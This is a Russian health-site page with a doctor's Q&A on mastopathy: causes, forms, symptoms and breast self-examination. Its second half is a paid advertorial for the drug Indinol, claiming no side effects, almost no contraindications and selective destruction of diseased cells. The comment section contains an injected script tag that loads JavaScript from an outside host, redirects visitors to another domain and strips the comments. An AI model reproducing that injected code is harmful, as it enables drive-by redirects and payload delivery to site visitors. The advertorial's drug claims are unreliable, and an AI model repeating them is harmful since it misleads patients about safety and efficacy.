Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сохранить грудь краси...  >>  Как сохранить грудь красивой и здоровой?
 
Обратная связь
 

Как сохранить грудь красивой и здоровой?

Размер шрифта
18 декабря 2011 08:00
  • google_analytics: false
  • Нравится

Грудь – это одна из прекраснейших частей женского тела, символ женственности и материнства. Но почему-то совсем немногие задумываются не только о внешней красоте груди, но и о её внутреннем здоровье.

Грудь – очень нежная часть женского тела, требующая внимательного и бережного к себе отношения. Помимо красоты, женская грудь может доставлять еще и неприятности ее очаровательным хозяйкам. Мастопатия как раз и есть тот самый подводный камень, который тянет женщину в пучину депрессии и плохого настроения. В последние годы количество женщин, страдающих мастопатией, начало расти с невероятной скоростью. Мастопатия, или фиброзно-кистозная болезнь, - доброкачественные изменения тканей молочной железы - всегда считалась недугом тех женщин, которым исполнилось 35-40 лет. Сегодня болезни женской груди набирают крутые обороты и подбираются даже к совсем молодым представительницам «слабого пола». Почему так происходит? Кто наиболее подвержен болезням груди? Нужно ли их лечить? На эти и многие другие вопросы отвечает врач УЗИ-диагностики, онколог-маммолог высшей категории ассоциации медицинских клиник www.goldenmed.ru, Штолль Елена Григорьевна.

Задать вопрос Штолль Елене Григорьевне.

Записаться на прием можно по телефону: : (495) 971-73-03

Почему в последние годы мастопатия «молодеет»?

Пока никто из врачей так и не назвал одной общей причины возникновения мастопатии. Все медики приходят к единому мнению – их несколько: нарушение гормонального фона, нервное напряжение, стрессы, курение, алкоголь, неправильное питание, раннее начало и отсутствие регулярной половой жизни, первая беременность после 30 лет, рождение всего лишь одного ребенка, аборт, отказ от кормления грудью или короткий период кормления – менее 5 месяцев. У каждой женщины свой набор проблем.

Также нужно учитывать, что за последние 100 лет изменился акушерский потрет женщины. Общий репродуктивный возраст женщины вырос почти в 2 раза, то есть на организм современной женщины происходит более длительное воздействие гормонов из-за раннего начала менструации до 12 лет и более позднего наступления климакса в 50-52 года. Кстати, и гинекологические заболевания подливают воду в огонь, дают развитию мастопатии дополнительные шансы. Ведь всё в женской репродуктивной системе взаимосвязано и идет одно за другим, как нитка за иголкой. Если у женщины есть заболевания женской половой сферы, возникнут и гормональные нарушения, а затем придет и мастопатия.

Неужели молодая девушка и взрослая женщина болеют одинаково? Или всё-таки существуют разные формы этой болезни, характерные для разных возрастов женщин?

Слово «мастопатия» имеет греческие корни и обозначает « mastos» - грудь и «pathos» - страдание, болезнь. Мастопатия, впрочем, как и многие заболевания, имеет несколько форм, а вернее – две: диффузную и узловую. Это обусловлено особенностью её строения. Молочная железа напоминает гроздь винограда с большим количеством железистой и жировой ткани, так как основная функция молочных желез — синтез и секреция молока. Диффузная форма подразумевает разрастание и изменение всех элементов железы. Диффузной мастопатией чаще болеют женщины в возрасте до 35 лет. А вот возраст пациенток с узловой формой чаще всего колеблется от 30 до 50 лет. При узловой форме появляются ограниченные уплотнения. Иногда ставится диагноз как диффузной, так и узловой формы одновременно. Симптомы более легкой диффузной мастопатии накладываются на тяжелую и сложную форму фиброзно-кистозной болезни – узловую. Поэтому чётких возрастных ограничений нет. Ясно одно, мастопатия диагностируется у 6 женщин из 10.

Может ли женщина сама поставить себе диагноз? Как распознать мастопатию?

Мастопатия часто начинается бессимптомно. Женщину ничего не беспокоит, и она старается лишний раз не тревожить своим визитом доктора – маммолога. Проходит немного времени и, к сожалению, вот они, нежданные симптомы, которые уже и появились, и доставляют беспокойства. Даже в совсем молодом возрасте современным женщинам следует тщательно следить за незнакомыми ощущениями в молочных железах. Как правило, ноющая боль и тяжесть в груди, особенно усиливающаяся перед менструацией – это и есть признак мастопатии. В некоторых случаях также отмечается увеличение лимфатических узлов в подмышках, причем, если дотронуться до них, они окажутся болезненными. Сама женщина при пальпации может нащупать уплотнения и перекатывающиеся шарики в молочной железе. Их контуры и границы определить сложно. Также, при фиброзно-кистозной болезни грудь может отекать, а ее форма меняться. Иногда если надавить на сосок, появляются выделения, а иногда обильная жидкость из сосков выходит и без надавливания.

Как правильно проводить самообследование груди?

Мастопатия в 90% случаев может быть диагностирована самой женщиной при самообследовании. Самообследование необходимо проводить каждый месяц на 6-12 день менструального цикла, когда молочные железы мягче и их легче пальпировать.

1. Осмотрите перед зеркалом форму груди и внешний вид кожи сосков с опущенными руками.

2. Поднимите руки за голову и осмотрите грудь. Обратите внимание на изменение формы или размеров одной из молочных желез и цвет кожи.

3. Запрокиньте правую руку за голову. Медленно, круговыми движениями прощупывайте правую грудь, обращая внимание на возможные припухлости и утолщения. Повторите то же с левой грудью.

4. Сдавите сосок у его основания большим и указательным пальцами и посмотрите, есть ли какие-либо выделения.

5. Обследуйте грудь в положении лежа. Прощупывайте круговыми движениями с легким надавливанием, начиная с краев молочной железы в направлении соска.

6. Прощупайте круговыми движениями левую и правую подмышечные впадины. Прикладывая ежемесячно, минимум усилий вы можете сохранить себе жизнь. В случае, если вы заподозрили любые изменения в молочной железе срочно посетите маммолога.

Чем же так опасна мастопатия? Как часто нужно посещать маммолога?

Не нужно пугаться, мастопатия – это доброкачественные изменения молочных желез. Но на фоне мастопатии риск развития рака молочной железы увеличивается в 3-5 раз. Для женщин 20-44 лет рак молочной железы – одна из главных причина смерти и инвалидности. Вот почему нужно регулярно посещать маммолога и обязательно лечить мастопатию. Чем раньше будет начато лечение, тем меньше шансов, что может возникнуть злокачественная опухоль. Опытный маммолог не остановится только на осмотре молочных желез. Он обратится к современным методам диагностики мастопатии: УЗИ и маммографии. УЗИ рекомендовано для более молодых женщин и не имеет противопоказаний в любом возрасте, в том числе и при беременности, а вот маммографию лучше проходить ежегодно женщинам с возраста 35 – 40 лет, или при явных проявлениях болезни.

Какое лечение эффективнее всего при мастопатии? Может ли женщина сама вылечить мастопатию?

Конечно, эффективное лечение может назначить только сам врач, проведя диагностику и поставив точный диагноз. Существует несколько методов лечения. Некоторые виды опухолевых узлов при мастопатии необходимо удалять. Лечение мастопатии направлено на нормализацию гормонального фона и снятие симптомов болезни. Образ жизни, привычки в питании: всё это влияет на выработку гормонов. Поэтому всё же лучше ограничить себя в курении и алкоголе и следить за своим питанием: снизить потребление жиров, включить в диету овощи и фрукты. Большую роль в лечении мастопатии занимают гормональные препараты, которые подбираются индивидуально для каждой женщины. Правда, после отмены приёма гормонов заболевание может вернуться. К тому же, есть много ограничений при приёме гормональных препаратов: сахарный диабет, заболевания печени, варикозное расширение вен. Вот почему в последние годы, врачи стали использовать в лечении мастопатии негормональные препараты растительного происхождения. В чем принципиальные отличия таких негормональных препаратов? Насколько они эффективны? Применение негормональных препаратов растительного происхождения отличный выход для тех, кому противопоказано лечение гормональными средствами. Так, новое, негормональное средство Индинол, разработанное ведущими российскими учеными ММА им И.М. Сеченова, содержит активную молекулу из капусты брокколи - индол -3- карбинол. Это вещество обладает комплексным действием: нормализует гормональный фон, воздействует только на больные клетки и беспощадно расправляется с ними, не затрагивая здоровые. Рецидивов мастопатии после приема Индинола, как правило, не наблюдается. Препарат обладает высоким профилем безопасности за счёт уникальной технологии производства, которая позволяет получать высокоочищенные активные молекулы без природных примесей. Сам индол-3-карбинол практически не имеет противопоказаний и может применяться в любом возрасте как с профилактической, так и с лечебной целью.

Как долго необходимо принимать негормональные препараты?

Рекомендуемый курс лечения препаратом Индинол – две капсулы дважды в день в течение 6 месяцев. Индинол совместим и с хирургическими, и с гормональными методами лечения. Также его можно применять после удаления новообразований в молочной железе. Индинол эффективен в терапии различных форм мастопатии, позволяет избавиться от болей и неприятных ощущений. Он уникален тем, что устраняет саму причину заболевания, а не только симптомы. Как показали многочисленные клинические исследования, после прохождения полного 6-месячного курса достигается стойкий положительный эффект. Эффект от его применения виден с первого месяца и развивается постепенно, достигая максимума через 6 месяцев после начала приёма, что связано с глубинными механизмами действия на клетки молочной железы. Отсутствие побочных эффектов, даже при длительном применении, в сочетании с достаточно высокой эффективностью позволяет рекомендовать Индинол в качестве одного из средств первого ряда препаратов в лечении мастопатии.

Препарат обладает высоким профилем безопасности за счёт уникальной технологии производства, которая позволяет получать высокоочищенные активные молекулы без природных примесей. Сам индол-3-карбинол практически не имеет противопоказаний и может применяться в любом возрасте как с профилактической, так и с лечебной целью.

Узнайте больше сайте www.indinol.ru или проконсультируйтесь по телефону 8 800 555 8800

На правах рекламы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.